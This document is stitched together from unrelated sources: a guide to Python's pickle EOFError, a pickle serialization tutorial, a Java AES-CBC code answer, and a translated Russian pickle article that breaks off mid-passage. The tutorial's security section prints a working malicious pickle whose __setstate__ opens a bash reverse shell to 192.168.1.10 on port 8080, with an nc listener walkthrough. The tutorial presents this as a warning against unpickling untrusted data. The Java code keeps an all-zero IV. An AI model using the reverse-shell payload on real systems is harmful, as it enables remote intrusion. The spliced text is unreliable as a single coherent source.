“EOFError: Ran out of input” is a Python exception raised when pickle tries to load data from a file and reaches the end before a complete object has been read. It generally happens because the file is empty.
Instead of finishing normally, the program stops with an EOFError message. This guide covers the causes of the error and the ways to fix it.
Why Does an Eoferror: Ran Out of Input Error Occur?
The EOFError: Ran out of input error occurs mainly because a program tries to unpickle an empty file. The causes covered below are:
- The file is empty.
- Using unnecessary functions in the program.
- Overwriting a pickle file.
- Using an unknown filename.
- Using an incorrect syntax, such as passing 'wb' instead of 'rb' to open() when loading. The correct form is df = pickle.load(open('df.p', 'rb'))
– The File Is Empty
When a file is empty, pickle.load() (or Unpickler.load()) has nothing to read and raises the error as soon as the file is loaded. It is also known as the pickle.load EOFError.
Given below are a quick program and its output that explain the cause of the error.
Program:
import pickle

scores = {}
with open(target, "rb") as file:
    unpickler = pickle.Unpickler(file)
    scores = unpickler.load()  # raises EOFError if the file is empty
    if not isinstance(scores, dict):
        scores = {}
Output:
File "G:\python\pendu\user_test.py", line 3, in <module>
    save_user_points("Magixs", 31)
File "G:\python\pendu\user.py", line 22, in save_user_points
    scores = unpickler.load()
EOFError: Ran out of input
The error occurred because the program opened an empty file and tried to unpickle it without first checking whether it contained any data.
– Using Unnecessary Functions in the Program
Sometimes an unnecessary function call in the program is what creates the empty file in the first place, which then leads to EOFError: Ran out of input.
Therefore, avoid using functions that are not required. Here’s the same example as above, this time with the extra first line that creates the file if it does not exist yet:
open(target, 'a').close()  # creates an empty file when target is missing
scores = {}
with open(target, "rb") as file:
    unpickler = pickle.Unpickler(file)
    scores = unpickler.load()
    if not isinstance(scores, dict):
        scores = {}
– Overwrite a Pickle File
Sometimes, an empty pickle file can come as a surprise. This is because the programmer may have opened the file in 'wb' or some other mode that truncates it.
Here’s an example of a program that overwrites the file:
with open(filename, 'wb') as g:
    classification_dict = pickle.load(g)
Opening the file in 'wb' mode empties it, and the pickle.load(g) call then fails because the file is not open for reading. This mistake is easily made before switching to the intended:
with open(filename, 'rb') as g:
After that, the programmer will get an EOFError, because the previous block of code overwrote the pickle file.
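The truncation can be reproduced in a few lines. The following is a minimal sketch, assuming a temporary directory and a hypothetical file name data.pkl; it only illustrates the behaviour of open() in 'wb' mode and is not taken from the original program.

```python
import os
import pickle
import tempfile

path = os.path.join(tempfile.mkdtemp(), "data.pkl")  # hypothetical file name

# Write a real pickle first, so the file has content.
with open(path, "wb") as fh:
    pickle.dump({"a": 1}, fh)
size_after_dump = os.path.getsize(path)

# Opening in 'wb' again truncates the file, even if nothing is written.
with open(path, "wb"):
    pass
size_after_reopen = os.path.getsize(path)

# Loading the now-empty file raises EOFError.
try:
    with open(path, "rb") as fh:
        pickle.load(fh)
    error_name = None
except EOFError as exc:
    error_name = type(exc).__name__

print(size_after_dump, size_after_reopen, error_name)
```

The second size is zero, which is why the later load runs out of input.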
– Using an Unknown File Name
This error is related to using a filename that the program has not written to before. Opening such a name in write or append mode creates a new, empty file, and a later attempt to load it raises the EOFError. Opening it in read mode fails earlier, with FileNotFoundError.
The error is not specific to one program. Because several libraries load pickled data internally, it is commonly reported in these forms:
- Eoferror: ran out of input pandas.
- Eoferror: ran out of input PyTorch.
- Eoferror: ran out of input yolov5.
– Using an Incorrect Syntax
When typing a program, one has to be careful with the arguments passed to each function. A wrong file mode is still valid Python, so the interpreter does not flag it, but it changes what the program does. Here’s a quick example of writing a pickle file:
pickle.dump(dg, open('dg.a', 'wb'))
However, if the programmer copied this code to read the file back but forgot to change 'wb' to 'rb', the file is overwritten instead of loaded:
dg = pickle.load(open('dg.a', 'wb'))
How To Fix the Eoferror: Ran Out of Input Error?
There are multiple ways in which this error can be resolved. Common fixes include checking whether the file is empty before loading it, avoiding unnecessary functions in the program and refraining from overwriting the pickle file.
A well-known way to fix this issue is to add a condition for the case where the file is empty. If the condition is left out, an EOFError will occur. “Ran out of input” means that the end of the file was reached before any complete object could be read, which is what happens with an empty file.
– Use an Additional Command To Show That the File Is Empty
When a program reads a file, add a check so that an empty file does not cause an error. The error “EOFError: Ran out of input” can be fixed this way.
Let’s use the same example given above at the start. To fix that error, here’s how the program should have been written:
import os
import pickle

scores = {}  # scores stays an empty dict if the file is empty
if os.path.getsize(target) > 0:
    with open(target, "rb") as h:
        unpickler = pickle.Unpickler(h)
        # if the file is not empty, scores will be equal
        # to the value unpickled
        scores = unpickler.load()
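A slightly more defensive variant catches the exceptions instead of checking the size first. This is a minimal sketch, assuming that a missing or empty file should simply yield an empty dict; the helper name load_scores and the file name scores.pkl are hypothetical and not part of the original program.

```python
import os
import pickle
import tempfile


def load_scores(path):
    """Return the pickled dict stored at path, or {} if nothing usable is there."""
    try:
        with open(path, "rb") as fh:
            scores = pickle.load(fh)
    except (FileNotFoundError, EOFError):
        # Missing file or empty file: fall back to an empty dict.
        return {}
    return scores if isinstance(scores, dict) else {}


# Usage: an empty file no longer raises EOFError.
demo_dir = tempfile.mkdtemp()
scores_path = os.path.join(demo_dir, "scores.pkl")  # hypothetical file name
open(scores_path, "wb").close()                      # create an empty file
empty_result = load_scores(scores_path)

# Once real data has been written, the same call returns it.
with open(scores_path, "wb") as fh:
    pickle.dump({"Magixs": 31}, fh)
filled_result = load_scores(scores_path)
```

Wrapping the read in one function also keeps the file mode in a single place, which makes an accidental 'wb' less likely.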
– Avoid Using an Unnecessary Function in the Program
As the heading says, do not use unnecessary functions while coding, because they can confuse the programmer and can lead to an EOFError.
The top line, “open(target, 'a').close()”, is not necessary in the program given in the section “Using Unnecessary Functions in the Program”. It creates an empty file when the target does not exist, so the load that follows runs out of input.
– Avoid Overwriting a Pickle File
Another way to remove the program’s EOFError is to find and correct the line that overwrites the pickle file. The programmer can also take steps to avoid overwriting files in the first place.
It is recommended to keep a note of the files the program uses to avoid confusion. An example was given earlier in the section “Using an Incorrect Syntax”, so keeping that in mind, be careful not to overwrite files.
Here is the line that opens the file for writing when it should be read:
dg = pickle.load(open('dg.e', 'wb'))
This causes the overwriting issue. The correct way is:
dg = pickle.load(open('dg.e', 'rb'))
– Do Not Use an Unknown Filename
Before opening a file, make sure the name refers to the file that was actually written, so that the program reads the data it expects. A filename is effectively unknown to the program if it is misspelled or points to a different directory than the one the file was saved in.
Opening an unknown filename for reading raises FileNotFoundError. If an earlier line created that name in write or append mode, the file exists but is empty, and loading it ends in the EOFError message. For example, the program may write its data under one filename and then try to load a slightly different one.
In the code below, target must be the same path that was used when the data was pickled:
scores = {}  # scores is an empty dict already
if os.path.getsize(target) > 0:
    with open(target, "rb") as g:
        unpickler = pickle.Unpickler(g)
        # if the file is not empty, scores will be equal
        # to the value unpickled
        scores = unpickler.load()
If target names a file the program never wrote, this code does not return the expected data: os.path.getsize() raises FileNotFoundError when the file is missing, and scores stays empty when the file exists but holds nothing. So, make sure the filename is the right one.
– Use the Correct Syntax
This is another common reason for the EOFError while writing a program in the Python programming language. An easy way to avoid it is to take a few notes.
Before starting to code, look up and note down the basic syntax of the functions involved, in particular the modes accepted by open(): 'rb' reads a binary file, while 'wb' writes one and empties it first.
Doing so helps beginners avoid these mistakes while coding. Make sure to use the correct mode and do not overwrite the file that is about to be loaded.
FAQs
1. How To Fix Eoferror Eof When Reading a Line in Python Without Errors?
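“EOFError: EOF when reading a line” is raised by input() when it reaches the end of standard input without reading any data, for example when a script that expects input is run with nothing piped in. To fix this error, make sure the program receives as many lines as it asks for, or catch EOFError around the input() call and stop reading. When the number of lines is not known in advance, use a loop that reads until EOFError is raised.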
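In Python, this message comes from input() when standard input is exhausted. The following is a minimal sketch of a read loop that stops cleanly at end of input; the function name read_lines_until_eof is hypothetical, and standard input is replaced with an in-memory stream only so that the example runs on its own.

```python
import io
import sys


def read_lines_until_eof():
    """Collect lines from standard input until it is exhausted."""
    lines = []
    while True:
        try:
            lines.append(input())
        except EOFError:
            # No more input: stop reading instead of crashing.
            break
    return lines


# Simulate a two-line standard input for demonstration purposes.
original_stdin = sys.stdin
sys.stdin = io.StringIO("first\nsecond\n")
try:
    collected = read_lines_until_eof()
finally:
    sys.stdin = original_stdin
```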
2. How To Read a Pickle File in Python To Avoid an Eoferror Error?
The programmer can use the pandas library to read a pickle file in Python. The pandas module has a read_pickle() function that can be used to read a pickle file.
However, it does not avoid the empty-file issue: read_pickle() unpickles the file’s contents and raises an EOFError on an empty file in the same way. It is still necessary to check that the file exists and is not empty before reading it.
Conclusion
After reading this article, the reader will know why the EOFError: Ran out of input message appears and how to resolve it. Here is a quick recap of this guide:
- The EOFError usually occurs when the file is empty or has been accidentally overwritten.
- The best way to avoid errors like EOFError is to open the file in the correct mode: 'rb' for reading and 'wb' for writing.
- Before loading the pickled file, the program should handle the case where the file is empty and has no input in it.
- When working in Jupyter, or the console (Spyder), write a wrapper over the reading/writing code and call the wrapper subsequently.
The reader can now handle this error and continue programming efficiently. If difficulties arise, feel free to come back to this guide. Thank you for reading!
Watch Now This tutorial has a related video course created by the Real Python team. Watch it together with the written tutorial to deepen your understanding: Serializing Objects With the Python pickle Module
As a developer, you may sometimes need to send complex object hierarchies over a network or save the internal state of your objects to a disk or database for later use. To accomplish this, you can use a process called serialization, which is fully supported by the standard library thanks to the Python pickle module.
In this tutorial, you’ll learn:
- What it means to serialize and deserialize an object
- Which modules you can use to serialize objects in Python
- Which kinds of objects can be serialized with the Python pickle module
- How to use the Python pickle module to serialize object hierarchies
- What the risks are when deserializing an object from an untrusted source
Let’s get pickling!
Serialization in Python
The serialization process is a way to convert a data structure into a linear form that can be stored or transmitted over a network.
In Python, serialization allows you to take a complex object structure and transform it into a stream of bytes that can be saved to a disk or sent over a network. You may also see this process referred to as marshalling. The reverse process, which takes a stream of bytes and converts it back into a data structure, is called deserialization or unmarshalling.
Serialization can be used in a lot of different situations. One of the most common uses is saving the state of a neural network after the training phase so that you can use it later without having to redo the training.
Python offers three different modules in the standard library that allow you to serialize and deserialize objects:
- The marshal module
- The json module
- The pickle module
In addition, Python supports XML, which you can also use to serialize objects.
The marshal module is the oldest of the three listed above. It exists mainly to read and write the compiled bytecode of Python modules, or the .pyc files you get when the interpreter imports a Python module. So, even though you can use marshal to serialize some of your objects, it’s not recommended.
The json module is the newest of the three. It allows you to work with standard JSON files. JSON is a very convenient and widely used format for data exchange.
There are several reasons to choose the JSON format: It’s human readable and language independent, and it’s lighter than XML. With the json module, you can serialize and deserialize several standard Python types:
bool
dict
int
float
list
str
tuple
None
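A short round trip shows these types in practice. This is a minimal sketch with made-up sample data; note that JSON has no tuple type, so a tuple comes back as a list.

```python
import json

# Sample data covering the types listed above (values are illustrative only).
record = {
    "flag": True,
    "count": 3,
    "ratio": 0.5,
    "name": "hey",
    "items": [1, 2, 3],
    "pair": (22, 23),
    "nothing": None,
}

encoded = json.dumps(record)   # a human-readable str
decoded = json.loads(encoded)  # back to Python objects

print(encoded)
print(decoded["pair"])         # the tuple is now a list
```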
The Python pickle module is another way to serialize and deserialize objects in Python. It differs from the json module in that it serializes objects in a binary format, which means the result is not human readable. However, it’s also faster and it works with many more Python types right out of the box, including your custom-defined objects.
So, you have several different ways to serialize and deserialize objects in Python. But which one should you use? The short answer is that there’s no one-size-fits-all solution. It all depends on your use case.
Here are three general guidelines for deciding which approach to use:
- Don’t use the marshal module. It’s used mainly by the interpreter, and the official documentation warns that the Python maintainers may modify the format in backward-incompatible ways.
- The json module and XML are good choices if you need interoperability with different languages or a human-readable format.
- The Python pickle module is a better choice for all the remaining use cases. If you don’t need a human-readable format or a standard interoperable format, or if you need to serialize custom objects, then go with pickle.
Inside the Python pickle Module
The Python pickle module basically consists of four functions:
pickle.dump(obj, file, protocol=None, *, fix_imports=True, buffer_callback=None)
pickle.dumps(obj, protocol=None, *, fix_imports=True, buffer_callback=None)
pickle.load(file, *, fix_imports=True, encoding="ASCII", errors="strict", buffers=None)
pickle.loads(bytes_object, *, fix_imports=True, encoding="ASCII", errors="strict", buffers=None)
The first two functions are used during the pickling process, and the other two are used during unpickling. The only difference between dump() and dumps() is that the first writes the serialization result to a file, whereas the second returns it as a bytes object.
To differentiate dumps() from dump(), it’s helpful to remember that the s at the end of the function name stands for string. The same concept also applies to load() and loads(): The first one reads a file to start the unpickling process, and the second one operates on a bytes object.
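The two pairs of functions can be compared side by side. The following is a minimal sketch, assuming a temporary directory and a hypothetical file name data.pkl; the sample dictionary is made up for illustration.

```python
import os
import pickle
import tempfile

data = {"first": "a", "second": 2, "third": [1, 2, 3]}

# dumps()/loads(): round trip through an in-memory bytes object.
as_bytes = pickle.dumps(data)
from_bytes = pickle.loads(as_bytes)

# dump()/load(): round trip through a file opened in binary mode.
path = os.path.join(tempfile.mkdtemp(), "data.pkl")  # hypothetical file name
with open(path, "wb") as fh:
    pickle.dump(data, fh)
with open(path, "rb") as fh:
    from_file = pickle.load(fh)

print(type(as_bytes).__name__, from_bytes == from_file)
```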
Consider the following example. Say you have a custom-defined class named example_class with several different attributes, each of a different type:
a_number
a_string
a_dict
a_list
a_tuple
The example below shows how you can instantiate the class and pickle the instance to get a plain string. After pickling the class, you can change the value of its attributes without affecting the pickled string. You can then unpickle the pickled string in another variable, restoring an exact copy of the previously pickled class:
# pickling.py
import pickle

class example_class:
    a_number = 35
    a_string = "hey"
    a_list = [1, 2, 3]
    a_dict = {"first": "a", "second": 2, "third": [1, 2, 3]}
    a_tuple = (22, 23)

my_object = example_class()

my_pickled_object = pickle.dumps(my_object)  # Pickling the object
print(f"This is my pickled object:\n{my_pickled_object}\n")

my_object.a_dict = None

my_unpickled_object = pickle.loads(my_pickled_object)  # Unpickling the object
print(
    f"This is a_dict of the unpickled object:\n{my_unpickled_object.a_dict}\n")
In the example above, you create several different objects and serialize them with pickle. This produces a single string with the serialized result:
$ python pickling.py
This is my pickled object:
b'\x80\x03c__main__\nexample_class\nq\x00)\x81q\x01.'
This is a_dict of the unpickled object:
{'first': 'a', 'second': 2, 'third': [1, 2, 3]}
The pickling process ends correctly, storing your entire instance in this string: b'\x80\x03c__main__\nexample_class\nq\x00)\x81q\x01.'
After the pickling process ends, you modify your original object by setting the attribute a_dict to None.
Finally, you unpickle the string to a completely new instance. What you get is a deep copy of your original object structure from the time that the pickling process began.
Protocol Formats of the Python pickle Module
As mentioned above, the pickle module is Python-specific, and the result of a pickling process can be read only by another Python program. But even if you’re working with Python, it’s important to know that the pickle module has evolved over time.
This means that if you’ve pickled an object with a specific version of Python, then you may not be able to unpickle it with an older version. The compatibility depends on the protocol version that you used for the pickling process.
There are currently six different protocols that the Python pickle module can use. The higher the protocol version, the more recent the Python interpreter needs to be for unpickling.
- Protocol version 0 was the first version. Unlike later protocols, it’s human readable.
- Protocol version 1 was the first binary format.
- Protocol version 2 was introduced in Python 2.3.
- Protocol version 3 was added in Python 3.0. It can’t be unpickled by Python 2.x.
- Protocol version 4 was added in Python 3.4. It features support for a wider range of object sizes and types and is the default protocol starting with Python 3.8.
- Protocol version 5 was added in Python 3.8. It features support for out-of-band data and improved speeds for in-band data.
To choose a specific protocol, you need to specify the protocol version when you invoke dump() or dumps(). The load() and loads() functions detect the protocol from the data, so they take no protocol argument. If you don’t specify a protocol, then your interpreter will use the default version specified in the pickle.DEFAULT_PROTOCOL attribute.
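Selecting a protocol might look like the following minimal sketch. The sample list is made up; pickle.DEFAULT_PROTOCOL and pickle.HIGHEST_PROTOCOL are module attributes whose values depend on the interpreter version, so the sketch prints them rather than assuming specific numbers.

```python
import pickle

data = [1, 2, 3]

default_bytes = pickle.dumps(data)             # uses pickle.DEFAULT_PROTOCOL
proto0_bytes = pickle.dumps(data, protocol=0)  # oldest, ASCII-based protocol
highest_bytes = pickle.dumps(data, protocol=pickle.HIGHEST_PROTOCOL)

# loads() detects the protocol on its own; no protocol argument is needed.
results = [pickle.loads(b) for b in (default_bytes, proto0_bytes, highest_bytes)]

print(pickle.DEFAULT_PROTOCOL, pickle.HIGHEST_PROTOCOL)
print(proto0_bytes)
```

Protocol 0 output is plain ASCII, while protocols 2 and later begin with the byte \x80 followed by the protocol number.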
Picklable and Unpicklable Types
You’ve already learned that the Python pickle module can serialize many more types than the json module. However, not everything is picklable. The list of unpicklable objects includes database connections, opened network sockets, running threads, and others.
If you find yourself faced with an unpicklable object, then there are a couple of things that you can do. The first option is to use a third-party library such as dill.
The dill module extends the capabilities of pickle. According to the official documentation, it lets you serialize less common types like functions with yields, nested functions, lambdas, and many others.
To test this module, you can try to pickle a lambda function:
# pickling_error.py
import pickle
square = lambda x : x * x
my_pickle = pickle.dumps(square)
If you try to run this program, then you will get an exception because the Python pickle module can’t serialize a lambda function:
$ python pickling_error.py
Traceback (most recent call last):
File "pickling_error.py", line 6, in <module>
my_pickle = pickle.dumps(square)
_pickle.PicklingError: Can't pickle <function <lambda> at 0x10cd52cb0>: attribute lookup <lambda> on __main__ failed
Now try replacing the Python pickle module with dill to see if there’s any difference:
# pickling_dill.py
import dill
square = lambda x: x * x
my_pickle = dill.dumps(square)
print(my_pickle)
If you run this code, then you’ll see that the dill module serializes the lambda without returning an error:
$ python pickling_dill.py
b'\x80\x03cdill._dill\n_create_function\nq\x00(cdill._dill\n_load_type\nq\x01X\x08\x00\x00\x00CodeTypeq\x02\x85q\x03Rq\x04(K\x01K\x00K\x01K\x02KCC\x08|\x00|\x00\x14\x00S\x00q\x05N\x85q\x06)X\x01\x00\x00\x00xq\x07\x85q\x08X\x10\x00\x00\x00pickling_dill.pyq\tX\t\x00\x00\x00squareq\nK\x04C\x00q\x0b))tq\x0cRq\rc__builtin__\n__main__\nh\nNN}q\x0eNtq\x0fRq\x10.'
Another interesting feature of dill is that it can even serialize an entire interpreter session. Here’s an example:
>>> square = lambda x : x * x
>>> a = square(35)
>>> import math
>>> b = math.sqrt(484)
>>> import dill
>>> dill.dump_session('test.pkl')
>>> exit()
In this example, you start the interpreter, import a module, and define a lambda function along with a couple of other variables. You then import the dill module and invoke dump_session() to serialize the entire session.
If everything goes okay, then you should get a test.pkl file in your current directory:
$ ls test.pkl
4 -rw-r--r--@ 1 dave staff 439 Feb 3 10:52 test.pkl
Now you can start a new instance of the interpreter and load the test.pkl file to restore your last session:
>>> globals().items()
dict_items([('__name__', '__main__'), ('__doc__', None), ('__package__', None), ('__loader__', <class '_frozen_importlib.BuiltinImporter'>), ('__spec__', None), ('__annotations__', {}), ('__builtins__', <module 'builtins' (built-in)>)])
>>> import dill
>>> dill.load_session('test.pkl')
>>> globals().items()
dict_items([('__name__', '__main__'), ('__doc__', None), ('__package__', None), ('__loader__', <class '_frozen_importlib.BuiltinImporter'>), ('__spec__', None), ('__annotations__', {}), ('__builtins__', <module 'builtins' (built-in)>), ('dill', <module 'dill' from '/usr/local/lib/python3.7/site-packages/dill/__init__.py'>), ('square', <function <lambda> at 0x10a013a70>), ('a', 1225), ('math', <module 'math' from '/usr/local/Cellar/python/3.7.5/Frameworks/Python.framework/Versions/3.7/lib/python3.7/lib-dynload/math.cpython-37m-darwin.so'>), ('b', 22.0)])
>>> a
1225
>>> b
22.0
>>> square
<function <lambda> at 0x10a013a70>
The first globals().items() statement demonstrates that the interpreter is in the initial state. This means that you need to import the dill module and call load_session() to restore your serialized interpreter session.
Even though dill lets you serialize a wider range of objects than pickle, it can’t solve every serialization problem that you may have. If you need to serialize an object that contains a database connection, for example, then you’re in for a tough time because it’s an unserializable object even for dill.
So, how can you solve this problem?
The solution in this case is to exclude the object from the serialization process and to reinitialize the connection after the object is deserialized.
You can use __getstate__() to define what should be included in the pickling process. This method allows you to specify what you want to pickle. If you don’t override __getstate__(), then the default instance’s __dict__ will be used.
In the following example, you’ll see how you can define a class with several attributes and exclude one attribute from serialization with __getstate__():
# custom_pickling.py
import pickle

class foobar:
    def __init__(self):
        self.a = 35
        self.b = "test"
        self.c = lambda x: x * x

    def __getstate__(self):
        attributes = self.__dict__.copy()
        del attributes['c']
        return attributes

my_foobar_instance = foobar()
my_pickle_string = pickle.dumps(my_foobar_instance)
my_new_instance = pickle.loads(my_pickle_string)

print(my_new_instance.__dict__)
In this example, you create an object with three attributes. Since one attribute is a lambda, the object is unpicklable with the standard pickle module.
To address this issue, you specify what to pickle with __getstate__(). You first clone the entire __dict__ of the instance to have all the attributes defined in the class, and then you manually remove the unpicklable c attribute.
If you run this example and then deserialize the object, then you’ll see that the new instance doesn’t contain the c attribute:
$ python custom_pickling.py
{'a': 35, 'b': 'test'}
But what if you wanted to do some additional initializations while unpickling, say by adding the excluded c object back to the deserialized instance? You can accomplish this with __setstate__():
# custom_unpickling.py
import pickle

class foobar:
    def __init__(self):
        self.a = 35
        self.b = "test"
        self.c = lambda x: x * x

    def __getstate__(self):
        attributes = self.__dict__.copy()
        del attributes['c']
        return attributes

    def __setstate__(self, state):
        self.__dict__ = state
        self.c = lambda x: x * x

my_foobar_instance = foobar()
my_pickle_string = pickle.dumps(my_foobar_instance)
my_new_instance = pickle.loads(my_pickle_string)
print(my_new_instance.__dict__)
By re-creating the excluded c attribute in __setstate__(), you ensure that it appears in the __dict__ of the unpickled instance.
Compression of Pickled Objects
Although the pickle data format is a compact binary representation of an object structure, you can still optimize your pickled string by compressing it with bzip2 or gzip.
To compress a pickled string with bzip2, you can use the bz2 module provided in the standard library.
In the following example, you’ll take a string, pickle it, and then compress it using the bz2 library:
>>> import pickle
>>> import bz2
>>> my_string = """Per me si va ne la città dolente,
... per me si va ne l'etterno dolore,
... per me si va tra la perduta gente.
... Giustizia mosse il mio alto fattore:
... fecemi la divina podestate,
... la somma sapienza e 'l primo amore;
... dinanzi a me non fuor cose create
... se non etterne, e io etterno duro.
... Lasciate ogne speranza, voi ch'intrate."""
>>> pickled = pickle.dumps(my_string)
>>> compressed = bz2.compress(pickled)
>>> len(my_string)
315
>>> len(compressed)
259
When using compression, bear in mind that smaller files come at the cost of a slower process.
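To read compressed data back, decompress it before unpickling. The following is a minimal sketch of the full round trip with both bz2 and gzip, using a made-up, highly repetitive payload so that the size difference is easy to see; real data may compress much less.

```python
import bz2
import gzip
import pickle

payload = ["serialization"] * 1000  # repetitive sample data compresses well

pickled = pickle.dumps(payload)
bz2_blob = bz2.compress(pickled)
gzip_blob = gzip.compress(pickled)

# Decompress first, then unpickle.
restored_bz2 = pickle.loads(bz2.decompress(bz2_blob))
restored_gzip = pickle.loads(gzip.decompress(gzip_blob))

print(len(pickled), len(bz2_blob), len(gzip_blob))
```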
Security Concerns With the Python pickle Module
You now know how to use the pickle module to serialize and deserialize objects in Python. The serialization process is very convenient when you need to save your object’s state to disk or to transmit it over a network.
However, there’s one more thing you need to know about the Python pickle module: It’s not secure. Do you remember the discussion of __setstate__()? Well, that method is great for doing more initialization while unpickling, but it can also be used to execute arbitrary code during the unpickling process!
So, what can you do to reduce this risk?
Sadly, not much. The rule of thumb is to never unpickle data that comes from an untrusted source or is transmitted over an insecure network. In order to prevent man-in-the-middle attacks, it’s a good idea to use libraries such as hmac to sign the data and ensure it hasn’t been tampered with.
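Signing with hmac could be sketched as follows. This is a minimal illustration under stated assumptions, not a complete security design: the key SECRET_KEY, the helper names sign_pickle and load_signed_pickle, and the layout of a 32-byte HMAC-SHA256 tag followed by the payload are all hypothetical choices. It only helps when both sides share a secret that the attacker does not know.

```python
import hashlib
import hmac
import pickle

SECRET_KEY = b"replace-with-a-real-secret"  # hypothetical shared key


def sign_pickle(obj):
    """Pickle obj and prepend an HMAC-SHA256 tag (32 bytes)."""
    payload = pickle.dumps(obj)
    tag = hmac.new(SECRET_KEY, payload, hashlib.sha256).digest()
    return tag + payload


def load_signed_pickle(blob):
    """Verify the tag before unpickling; raise ValueError on mismatch."""
    tag, payload = blob[:32], blob[32:]
    expected = hmac.new(SECRET_KEY, payload, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("signature mismatch: refusing to unpickle")
    return pickle.loads(payload)


blob = sign_pickle({"user": "dave"})
# Flip one bit in the payload to simulate tampering in transit.
tampered = blob[:-1] + bytes([blob[-1] ^ 1])
```

The check runs before pickle.loads() is called, so a modified payload is rejected without ever being unpickled.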
The following example illustrates how unpickling a tampered pickle could expose your system to attackers, even giving them a working remote shell:
# remote.py
import pickle
import os

class foobar:
    def __init__(self):
        pass

    def __getstate__(self):
        return self.__dict__

    def __setstate__(self, state):
        # The attack is from 192.168.1.10
        # The attacker is listening on port 8080
        os.system('/bin/bash -c '
                  '"/bin/bash -i >& /dev/tcp/192.168.1.10/8080 0>&1"')

my_foobar = foobar()
my_pickle = pickle.dumps(my_foobar)
my_unpickle = pickle.loads(my_pickle)
In this example, the unpickling process executes __setstate__(), which executes a Bash command to open a remote shell to the 192.168.1.10 machine on port 8080.
Here’s how you can safely test this script on your Mac or your Linux box. First, open the terminal and use the nc command to listen for a connection to port 8080:
$ nc -l 8080
This will be the attacker terminal. If everything works, then the command will seem to hang.
Next, open another terminal on the same computer (or on any other computer on the network) and execute the Python code above for unpickling the malicious code. Be sure to change the IP address in the code to your attacking terminal’s IP address. In my example, the attacker’s IP address is 192.168.1.10.
By executing this code, the victim will expose a shell to the attacker:
$ python remote.py
If everything works, a Bash shell will appear on the attacking console. This console can now operate directly on the attacked system:
$ nc -l 8080
bash: no job control in this shell
The default interactive shell is now zsh.
To update your account to use zsh, please run `chsh -s /bin/zsh`.
For more details, please visit https://support.apple.com/kb/HT208050.
bash-3.2$
So, let me repeat this critical point once again: Do not use the pickle module to deserialize objects from untrusted sources!
Conclusion
You now know how to use the Python pickle module to convert an object hierarchy to a stream of bytes that can be saved to a disk or transmitted over a network. You also know that the deserialization process in Python must be used with care since unpickling something that comes from an untrusted source can be extremely dangerous.
In this tutorial, you’ve learned:
- What it means to serialize and deserialize an object
- Which modules you can use to serialize objects in Python
- Which kinds of objects can be serialized with the Python pickle module
- How to use the Python pickle module to serialize object hierarchies
- What the risks are of unpickling from an untrusted source
With this knowledge, you’re well equipped to persist your objects using the Python pickle module. As an added bonus, you’re ready to explain the dangers of deserializing malicious pickles to your friends and coworkers.
If you have any questions, then leave a comment down below or contact me on Twitter!
The main issue in your code was caused by a failure to specify an IV value. You must specify an IV value when doing CBC-mode encryption and use that same value when performing the CBC-mode decryption.
Another problem is the mix and match of creating strings from byte arrays and base64-encoding. You also return null from your decrypt method every time. Even if you meant return original.toString();, that’s still wrong (because toString() doesn’t do what you wish it would on a byte array).
Below is an improved version of your code. It’s far from optimal, but it compiles and works. You need to improve this to use a random IV. Also, if you plan to derive keys from passwords, don’t just get the bytes, use a derivation function such as PBKDF2. You can see an example of using PBKDF2 in the JNCryptor source.
import java.nio.charset.Charset;
import java.security.GeneralSecurityException;
import javax.crypto.Cipher;
import javax.crypto.spec.IvParameterSpec;
import javax.crypto.spec.SecretKeySpec;

public class EncryptionTest {

    public static void main(String[] args) {
        try {
            String key = "ThisIsASecretKey";
            byte[] ciphertext = encrypt(key, "1234567890123456");
            System.out.println("decrypted value:" + (decrypt(key, ciphertext)));
        } catch (GeneralSecurityException e) {
            e.printStackTrace();
        }
    }

    public static byte[] encrypt(String key, String value)
            throws GeneralSecurityException {
        byte[] raw = key.getBytes(Charset.forName("UTF-8"));
        if (raw.length != 16) {
            throw new IllegalArgumentException("Invalid key size.");
        }
        SecretKeySpec skeySpec = new SecretKeySpec(raw, "AES");
        Cipher cipher = Cipher.getInstance("AES/CBC/PKCS5Padding");
        // All-zero IV, kept from the original for simplicity; use a random IV in real code
        cipher.init(Cipher.ENCRYPT_MODE, skeySpec,
                new IvParameterSpec(new byte[16]));
        return cipher.doFinal(value.getBytes(Charset.forName("UTF-8")));
    }

    public static String decrypt(String key, byte[] encrypted)
            throws GeneralSecurityException {
        byte[] raw = key.getBytes(Charset.forName("UTF-8"));
        if (raw.length != 16) {
            throw new IllegalArgumentException("Invalid key size.");
        }
        SecretKeySpec skeySpec = new SecretKeySpec(raw, "AES");
        Cipher cipher = Cipher.getInstance("AES/CBC/PKCS5Padding");
        // Must be the same IV that was used for encryption
        cipher.init(Cipher.DECRYPT_MODE, skeySpec,
                new IvParameterSpec(new byte[16]));
        byte[] original = cipher.doFinal(encrypted);
        return new String(original, Charset.forName("UTF-8"));
    }
}
Время от времени требуется сохранить на диск или отослать по сети объект со сложной структурой. Например, текущее состояние нейронной сети, находящейся в процессе обучения. Процесс перевода структуры данных в цепочку битов называется сериализацией.
После прочтения статьи вы будете знать:
- что такое сериализация и десериализация;
- как применять эти процессы для собственного удобства;
- какие существуют встроенные и сторонние библиотеки Python для сериализации;
- чем отличаются протоколы
pickle
; - в чём преимущество
dill
передpickle
; - как с помощью
dill
сохранить сессию интерпретатора; - можно ли сжать сериализованные данные;
- какие бывают проблемы с безопасностью процесса десериализации.
Итак, сериализация (англ. serialization, marshalling) – это способ преобразования структуры данных в линейную форму, которую можно сохранить или передать по сети. Обратный процесс преобразования сериализованного объекта в исходную структуру данных называется десериализацией (англ. deserialization, unmarshalling).
В стандартной библиотеке Python три модуля позволяют сериализовать и десериализовать объекты:
marshal
json
pickle
Кроме того, Python поддерживает XML, который также можно применять для сериализации объектов.
Самый старый модуль из перечисленных – marshal
. Он используется для чтения и записи байт-кода модулей Python и .pyc
-файлов, создаваемых при импорте модулей Python. Хотя его и можно использовать для сериализации, делать это не рекомендуется.
The json module handles standard JSON files. JSON is a widely used data interchange format that is human-readable and independent of the programming language. With the json module you can serialize and deserialize the standard Python data types:
- bool
- dict
- int
- float
- list
- str
- tuple (written as a JSON array and read back as a list)
- None
Finally, another built-in way to serialize and deserialize objects in Python is the pickle module. It differs from the json module in that it serializes objects in binary form, so the result is not human-readable. In addition, pickle is often faster and can serialize many other Python types, including user-defined ones.
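The difference between the two modules can be seen in a minimal sketch. The record dictionary is hypothetical sample data, not something from the original article; the sketch only shows that JSON is text with no tuple type, while pickle is binary and keeps Python types intact.

```python
import json
import pickle

record = {"name": "demo", "point": (22, 23)}  # hypothetical sample data

# JSON is text and language-neutral, but it has no tuple type:
# the tuple comes back as a list.
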